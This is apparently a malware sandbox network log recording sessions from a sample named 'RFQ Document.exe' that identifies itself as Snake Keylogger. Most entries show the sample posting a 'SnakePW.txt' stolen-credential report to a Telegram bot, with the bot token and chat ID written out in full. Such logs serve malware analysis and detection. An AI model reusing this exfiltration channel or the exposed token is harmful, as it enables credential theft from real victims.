2021-09-28 05:58:57 UTC	191	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12704,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49786	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:23 UTC	18	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c33e2121 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:23 UTC	19	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 33 65 32 31 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c33e2121Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:23 UTC	19	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:23 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:23 UTC	20	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12591,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.4	49919	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:57 UTC	191	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d7d7ede1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:57 UTC	192	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 64 37 65 64 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d7d7ede1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:57 UTC	192	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:57 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:57 UTC	192	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12706,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.4	49920	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:57 UTC	193	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d7f489d9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:57 UTC	193	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 66 34 38 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d7f489d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:57 UTC	194	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:57 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:57 UTC	194	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12707,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.4	49921	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:57 UTC	195	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d80c5fc7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:57 UTC	195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 30 63 35 66 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d80c5fc7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	196	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12708,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.4	49922	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:58 UTC	196	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d82436fb Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:58 UTC	196	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 32 34 33 36 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d82436fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	197	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12709,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.4	49923	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:58 UTC	198	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d840d70d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:58 UTC	198	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 34 30 64 37 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d840d70dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	198	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	199	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12710,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.4	49924	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:58 UTC	199	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d85fd29c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:58 UTC	200	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 35 66 64 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d85fd29cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:58 UTC	200	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:58 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:58 UTC	200	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12711,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.4	49925	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
